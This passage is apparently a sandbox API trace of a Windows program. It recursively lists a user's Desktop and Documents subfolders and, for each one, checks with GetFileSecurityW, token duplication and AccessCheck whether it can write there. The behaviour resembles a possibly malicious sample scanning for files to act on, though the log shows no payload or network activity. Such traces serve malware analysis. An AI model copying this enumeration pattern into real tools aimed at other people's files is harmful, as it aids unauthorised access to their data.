GetLastError () returned 0x7a [0106.298] GetCurrentThread () returned 0xfffffffe [0106.298] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.298] GetCurrentProcess () returned 0xffffffff [0106.298] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.298] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.298] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.298] AccessCheck (in: pSecurityDescriptor=0x28a9cc0, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.298] CloseHandle (hObject=0x340) returned 1 [0106.298] CloseHandle (hObject=0x32c) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.299] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.299] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.299] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.299] GetLastError () returned 0x7a [0106.299] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W", RequestedInformation=0x7, pSecurityDescriptor=0x28a7520, nLength=0x98, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a7520, lpnLengthNeeded=0x281afc8) returned 1 [0106.299] GetLastError () returned 0x7a [0106.299] GetCurrentThread () returned 0xfffffffe [0106.299] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.299] GetCurrentProcess () returned 0xffffffff [0106.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.299] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.299] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.299] AccessCheck (in: pSecurityDescriptor=0x28a7520, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.299] CloseHandle (hObject=0x340) returned 1 [0106.299] CloseHandle (hObject=0x32c) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.299] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.299] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.300] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.300] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.300] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.300] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.300] GetLastError () returned 0x7a [0106.300] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents", RequestedInformation=0x7, pSecurityDescriptor=0x28a8778, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a8778, lpnLengthNeeded=0x281baf8) returned 1 [0106.300] GetLastError () returned 0x7a [0106.300] GetCurrentThread () returned 0xfffffffe [0106.300] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.300] GetCurrentProcess () returned 0xffffffff [0106.300] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.300] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.300] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.300] AccessCheck (in: pSecurityDescriptor=0x28a8778, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.300] CloseHandle (hObject=0x344) returned 1 [0106.300] CloseHandle (hObject=0x33c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.300] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.301] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.301] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.301] GetLastError () returned 0x7a [0106.301] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh", RequestedInformation=0x7, pSecurityDescriptor=0x28a8778, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8778, lpnLengthNeeded=0x281b560) returned 1 [0106.301] GetLastError () returned 0x7a [0106.301] GetCurrentThread () returned 0xfffffffe [0106.301] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.301] GetCurrentProcess () returned 0xffffffff [0106.301] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.301] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.301] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.301] AccessCheck (in: pSecurityDescriptor=0x28a8778, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.301] CloseHandle (hObject=0x32c) returned 1 [0106.301] CloseHandle (hObject=0x344) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.301] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.302] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.302] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.303] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.303] GetLastError () returned 0x7a [0106.303] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes", RequestedInformation=0x7, pSecurityDescriptor=0x28a8800, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8800, lpnLengthNeeded=0x281b560) returned 1 [0106.303] GetLastError () returned 0x7a [0106.303] GetCurrentThread () returned 0xfffffffe [0106.303] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.303] GetCurrentProcess () returned 0xffffffff [0106.303] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.303] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.303] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.303] AccessCheck (in: pSecurityDescriptor=0x28a8800, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.303] CloseHandle (hObject=0x32c) returned 1 [0106.303] CloseHandle (hObject=0x344) returned 1 [0106.303] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.303] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.304] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.304] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.304] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.304] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes\\_private", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.304] GetLastError () returned 0x7a [0106.304] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\My Shapes\\_private", RequestedInformation=0x7, pSecurityDescriptor=0x28a8800, nLength=0xa4, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a8800, lpnLengthNeeded=0x281afc8) returned 1 [0106.304] GetLastError () returned 0x7a [0106.304] GetCurrentThread () returned 0xfffffffe [0106.304] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.304] GetCurrentProcess () returned 0xffffffff [0106.304] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.304] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.304] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.304] AccessCheck (in: pSecurityDescriptor=0x28a8800, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.304] CloseHandle (hObject=0x340) returned 1 [0106.304] CloseHandle (hObject=0x32c) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.305] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.305] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.305] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.305] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.315] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.315] GetLastError () returned 0x7a [0106.315] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks", RequestedInformation=0x7, pSecurityDescriptor=0x28a8800, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8800, lpnLengthNeeded=0x281b560) returned 1 [0106.315] GetLastError () returned 0x7a [0106.315] GetCurrentThread () returned 0xfffffffe [0106.315] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.315] GetCurrentProcess () returned 0xffffffff [0106.315] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.315] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.315] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.315] AccessCheck (in: pSecurityDescriptor=0x28a8800, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.315] CloseHandle (hObject=0x32c) returned 1 [0106.315] CloseHandle (hObject=0x344) returned 1 [0106.315] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.315] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.315] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.316] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.316] GetLastError () returned 0x7a [0106.316] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\OneNote Notebooks\\My Notebook", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281afc8) returned 1 [0106.316] GetLastError () returned 0x7a [0106.316] GetCurrentThread () returned 0xfffffffe [0106.316] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.316] GetCurrentProcess () returned 0xffffffff [0106.316] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.316] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.316] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.316] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.316] CloseHandle (hObject=0x340) returned 1 [0106.316] CloseHandle (hObject=0x32c) returned 1 [0106.316] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.316] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.317] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.317] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.317] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.317] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.317] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.317] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.317] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.317] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.317] GetLastError () returned 0x7a [0106.317] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Outlook Files", RequestedInformation=0x7, pSecurityDescriptor=0x28a8800, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8800, lpnLengthNeeded=0x281b560) returned 1 [0106.318] 